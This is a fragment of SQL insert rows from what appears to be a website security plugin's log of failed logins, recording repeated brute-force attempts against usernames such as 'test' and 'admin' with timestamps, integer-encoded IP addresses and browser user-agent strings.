(99088, 1492482316.385949, 1, 'loginFailInvalidUsername', 'test', 0, 1269756669, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99087, 1492482125.511247, 1, 'loginFailInvalidUsername', 'test', 0, 3173368969, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99086, 1492474279.039241, 1, 'loginFailInvalidUsername', 'test', 0, 2077463425, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99085, 1492473599.070357, 1, 'loginFailInvalidUsername', 'test', 0, 1844610345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99084, 1492473597.859916, 1, 'loginFailInvalidUsername', 'test', 0, 1844610345, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99083, 1492472107.894271, 1, 'loginFailInvalidUsername', 'test', 0, 3149155376, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99082, 1492472105.658336, 1, 'loginFailInvalidUsername', 'test', 0, 3149155376, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99081, 1492470070.023897, 1, 'loginFailInvalidUsername', 'test', 0, 1336437487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99080, 1492470068.998546, 1, 'loginFailInvalidUsername', 'test', 0, 1336437487, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99079, 1492465942.123583, 1, 'loginFailInvalidUsername', 'test', 0, 2012678856, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/71FA'),
(99078, 1492465939.882075, 1, 'loginFailInvalidUsername', 'test', 0, 2012678856, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/71FA'),
(99076, 1492465797.975557, 1, 'loginFailInvalidUsername', 'test', 0, 1501255243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99077, 1492465799.096078, 1, 'loginFailInvalidUsername', 'test', 0, 1501255243, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99075, 1492465225.323388, 1, 'loginFailInvalidUsername', 'test', 0, 623870041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99074, 1492465224.186143, 1, 'loginFailInvalidUsername', 'test', 0, 623870041, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99073, 1492464311.421841, 1, 'loginFailInvalidUsername', 'test', 0, 3159789393, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99071, 1492462553.629508, 1, 'loginFailInvalidUsername', 'test', 0, 3419821096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99072, 1492464310.353534, 1, 'loginFailInvalidUsername', 'test', 0, 3159789393, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99070, 1492462552.096937, 1, 'loginFailInvalidUsername', 'test', 0, 3419821096, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99069, 1492461969.772244, 1, 'loginFailInvalidUsername', 'test', 0, 39334595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99068, 1492461968.685678, 1, 'loginFailInvalidUsername', 'test', 0, 39334595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99067, 1492458376.782817, 1, 'loginFailInvalidUsername', 'test', 0, 778261762, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99066, 1492458375.729174, 1, 'loginFailInvalidUsername', 'test', 0, 778261762, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99065, 1492458247.087990, 1, 'loginFailInvalidUsername', 'test', 0, 3574689614, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99064, 1492458246.128961, 1, 'loginFailInvalidUsername', 'test', 0, 3574689614, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99063, 1492456971.758008, 1, 'loginFailInvalidUsername', 'test', 0, 1979102065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99062, 1492456969.289684, 1, 'loginFailInvalidUsername', 'test', 0, 1979102065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99061, 1492456156.530750, 1, 'loginFailInvalidUsername', 'test', 0, 1659124010, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99060, 1492454875.803320, 1, 'loginFailInvalidUsername', 'test', 0, 1547635932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99059, 1492454874.729340, 1, 'loginFailInvalidUsername', 'test', 0, 1547635932, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99058, 1492454172.231823, 1, 'loginFailInvalidUsername', 'test', 0, 1405594119, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99057, 1492454171.309568, 1, 'loginFailInvalidUsername', 'test', 0, 1405594119, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99056, 1492451419.804913, 1, 'loginFailInvalidUsername', 'test', 0, 3536059489, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99055, 1492451418.110265, 1, 'loginFailInvalidUsername', 'test', 0, 3536059489, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99054, 1492449250.283931, 1, 'loginFailInvalidUsername', 'test', 0, 3016151415, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99053, 1492449248.233563, 1, 'loginFailInvalidUsername', 'test', 0, 3016151415, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99052, 1492449038.649001, 1, 'loginFailInvalidUsername', 'test', 0, 1589497003, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99051, 1492449037.461825, 1, 'loginFailInvalidUsername', 'test', 0, 1589497003, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99050, 1492448046.359765, 1, 'loginFailInvalidUsername', 'test', 0, 1392362811, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99049, 1492448045.430555, 1, 'loginFailInvalidUsername', 'test', 0, 1392362811, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99048, 1492447409.734878, 1, 'loginFailInvalidUsername', 'test', 0, 1379084173, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99047, 1492447407.986764, 1, 'loginFailInvalidUsername', 'test', 0, 1379084173, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99046, 1492444859.475864, 1, 'loginFailInvalidUsername', 'test', 0, 1605635691, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99045, 1492444647.752180, 1, 'loginFailInvalidUsername', 'test', 0, 1552930855, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99044, 1492444646.766899, 1, 'loginFailInvalidUsername', 'test', 0, 1552930855, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99043, 1492443650.335870, 1, 'loginFailInvalidUsername', 'test', 0, 694592633, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99042, 1492443649.200151, 1, 'loginFailInvalidUsername', 'test', 0, 694592633, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99041, 1492442452.560003, 1, 'loginFailInvalidUsername', 'test', 0, 1840681748, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99040, 1492442451.574835, 1, 'loginFailInvalidUsername', 'test', 0, 1840681748, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99039, 1492441333.830586, 1, 'loginFailInvalidUsername', 'test', 0, 2537443566, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99038, 1492440946.348958, 1, 'loginFailInvalidUsername', 'test', 0, 3144934315, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99037, 1492440944.969344, 1, 'loginFailInvalidUsername', 'test', 0, 3144934315, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99036, 1492440490.266667, 1, 'loginFailInvalidUsername', 'test', 0, 1096748134, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99035, 1492440489.188882, 1, 'loginFailInvalidUsername', 'test', 0, 1096748134, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99034, 1492440453.622861, 1, 'loginFailInvalidUsername', 'test', 0, 86369906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99033, 1492440451.917973, 1, 'loginFailInvalidUsername', 'test', 0, 86369906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99032, 1492439406.754473, 1, 'loginFailInvalidUsername', 'test', 0, 1768869012, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99031, 1492436051.263336, 1, 'loginFailInvalidUsername', 'test', 0, 39580259, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99030, 1492436050.154445, 1, 'loginFailInvalidUsername', 'test', 0, 39580259, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99029, 1492433471.181095, 1, 'loginFailInvalidUsername', 'test', 0, 737893407, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99028, 1492433469.764543, 1, 'loginFailInvalidUsername', 'test', 0, 737893407, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99027, 1492430707.233486, 1, 'loginFailInvalidUsername', 'test', 0, 979498369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99026, 1492430705.292263, 1, 'loginFailInvalidUsername', 'test', 0, 979498369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99025, 1492426556.454159, 1, 'loginFailInvalidUsername', 'test', 0, 1416403101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99024, 1492426555.382154, 1, 'loginFailInvalidUsername', 'test', 0, 1416403101, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99023, 1492426386.807316, 1, 'loginFailInvalidUsername', 'test', 0, 635762866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99022, 1492426385.805035, 1, 'loginFailInvalidUsername', 'test', 0, 635762866, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99021, 1492423729.884693, 1, 'loginFailInvalidUsername', 'test', 0, 2982956000, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99020, 1492423698.838885, 1, 'loginFailInvalidUsername', 'test', 0, 86607465, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99019, 1492420453.942509, 1, 'loginFailInvalidUsername', 'test', 0, 1407362711, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99018, 1492420452.949161, 1, 'loginFailInvalidUsername', 'test', 0, 1407362711, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99017, 1492415875.621951, 1, 'loginFailInvalidUsername', 'test', 0, 1539009069, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99016, 1492415874.602261, 1, 'loginFailInvalidUsername', 'test', 0, 1539009069, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99015, 1492415874.259716, 1, 'loginFailInvalidUsername', 'test', 0, 1022582567, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99014, 1492415873.051512, 1, 'loginFailInvalidUsername', 'test', 0, 1022582567, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99013, 1492410570.055144, 1, 'loginFailInvalidUsername', 'test', 0, 2984576065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99012, 1492410568.774891, 1, 'loginFailInvalidUsername', 'test', 0, 2984576065, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99011, 1492409691.354469, 1, 'loginFailInvalidUsername', 'test', 0, 3126060520, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99010, 1492409690.125768, 1, 'loginFailInvalidUsername', 'test', 0, 3126060520, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99009, 1492408830.132073, 1, 'loginFailInvalidUsername', 'test', 0, 520785588, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99008, 1492408829.140826, 1, 'loginFailInvalidUsername', 'test', 0, 520785588, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99007, 1492406900.016585, 1, 'loginFailInvalidUsername', 'test', 0, 1603163213, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99006, 1492406897.483079, 1, 'loginFailInvalidUsername', 'test', 0, 1603163213, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99005, 1492405132.915170, 1, 'loginFailInvalidUsername', 'test', 0, 1598817237, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99004, 1492405131.904642, 1, 'loginFailInvalidUsername', 'test', 0, 1598817237, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99003, 1492396428.488859, 1, 'loginFailInvalidUsername', 'test', 0, 1249533309, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99002, 1492396427.084948, 1, 'loginFailInvalidUsername', 'test', 0, 1249533309, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99001, 1492383354.177347, 1, 'loginFailInvalidUsername', 'test', 0, 657474792, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99000, 1492383352.994905, 1, 'loginFailInvalidUsername', 'test', 0, 657474792, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98999, 1492382324.543246, 1, 'loginFailInvalidUsername', 'test', 0, 3392086306, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98998, 1492382323.276942, 1, 'loginFailInvalidUsername', 'test', 0, 3392086306, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98997, 1492376811.937722, 1, 'loginFailInvalidUsername', 'test', 0, 3355999165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98996, 1492376806.512096, 1, 'loginFailInvalidUsername', 'test', 0, 3355999165, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98995, 1492374182.133835, 1, 'loginFailValidUsername', 'julie', 2, 1958862038, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98994, 1492372720.513808, 1, 'loginFailInvalidUsername', 'test', 0, 657083502, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98993, 1492372709.274517, 1, 'loginFailInvalidUsername', 'test', 0, 657083502, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98992, 1492372682.926447, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98991, 1492372682.607868, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98989, 1492372681.969565, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98990, 1492372682.290295, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98988, 1492372681.651383, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98987, 1492372681.333381, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98986, 1492372681.015471, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98985, 1492372680.696084, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98984, 1492372680.376438, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98983, 1492372680.056354, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98982, 1492372679.736403, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98981, 1492372679.418574, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98980, 1492372679.101017, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98979, 1492372678.770914, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98978, 1492372678.453892, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98977, 1492372678.123081, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98976, 1492372677.793998, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98975, 1492372677.472911, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98974, 1492372677.153830, 1, 'loginFailValidUsername', 'admin', 1, 1728496878, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0'),
(98973, 1492371566.853451, 1, 'loginFailInvalidUsername', 'test', 0, 1545960047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98972, 1492371565.580215, 1, 'loginFailInvalidUsername', 'test', 0, 1545960047, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98971, 1492368592.246942, 1, 'loginFailInvalidUsername', 'test', 0, 1834833882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98970, 1492368591.188307, 1, 'loginFailInvalidUsername', 'test', 0, 1834833882, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98969, 1492368453.991124, 1, 'loginFailInvalidUsername', 'test', 0, 850014883, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98968, 1492368452.715296, 1, 'loginFailInvalidUsername', 'test', 0, 850014883, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98967, 1492365095.351315, 1, 'loginFailInvalidUsername', 'test', 0, 1729910275, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98966, 1492365093.977786, 1, 'loginFailInvalidUsername', 'test', 0, 1729910275, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98965, 1492364085.865056, 1, 'loginFailInvalidUsername', 'test', 0, 3120978290, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98964, 1492361461.551876, 1, 'loginFailInvalidUsername', 'test', 0, 2872169923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98963, 1492361460.317176, 1, 'loginFailInvalidUsername', 'test', 0, 2872169923, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98962, 1492361122.392773, 1, 'loginFailInvalidUsername', 'test', 0, 1186983720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98961, 1492361121.197061, 1, 'loginFailInvalidUsername', 'test', 0, 1186983720, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98960, 1492361021.044272, 1, 'loginFailInvalidUsername', 'test', 0, 697060593, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98959, 1492361019.703205, 1, 'loginFailInvalidUsername', 'test', 0, 697060593, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98958, 1492359198.615688, 1, 'loginFailInvalidUsername', 'test', 0, 1327449813, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98957, 1492356116.692406, 1, 'loginFailValidUsername', 'julie', 2, 1833643342, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(98956, 1492353083.814969, 1, 'loginFailInvalidUsername', 'test', 0, 1160255037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98955, 1492353080.511564, 1, 'loginFailInvalidUsername', 'test', 0, 1160255037, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98954, 1492351084.280742, 1, 'loginFailInvalidUsername', 'test', 0, 3170695288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98953, 1492351082.948421, 1, 'loginFailInvalidUsername', 'test', 0, 3170695288, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98952, 1492350028.996295, 1, 'loginFailInvalidUsername', 'test', 0, 1523791963, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98951, 1492350028.019961, 1, 'loginFailInvalidUsername', 'test', 0, 1523791963, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98950, 1492348620.088059, 1, 'loginFailInvalidUsername', 'test', 0, 2969824596, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98949, 1492348618.308176, 1, 'loginFailInvalidUsername', 'test', 0, 2969824596, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98948, 1492347933.988071, 1, 'loginFailInvalidUsername', 'test', 0, 2050351307, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98947, 1492346165.832197, 1, 'loginFailInvalidUsername', 'test', 0, 1504707797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98946, 1492346164.873923, 1, 'loginFailInvalidUsername', 'test', 0, 1504707797, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98945, 1492345216.458420, 1, 'loginFailInvalidUsername', 'test', 0, 1546989467, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98944, 1492342801.130664, 1, 'loginFailInvalidUsername', 'test', 0, 1832987732, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98943, 1492342799.089129, 1, 'loginFailInvalidUsername', 'test', 0, 1832987732, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98942, 1492340505.744288, 1, 'loginFailInvalidUsername', 'test', 0, 1308677291, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98941, 1492338920.096647, 1, 'loginFailInvalidUsername', 'test', 0, 3394689422, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98940, 1492338918.748659, 1, 'loginFailInvalidUsername', 'test', 0, 3394689422, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98939, 1492338485.551778, 1, 'loginFailInvalidUsername', 'test', 0, 694691779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98938, 1492338484.344586, 1, 'loginFailInvalidUsername', 'test', 0, 694691779, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98937, 1492337472.532804, 1, 'loginFailInvalidUsername', 'test', 0, 625844236, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(98936, 1492336084.105501, 1, 'loginFailValidUsername', 'julie', 2, 2972118216, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
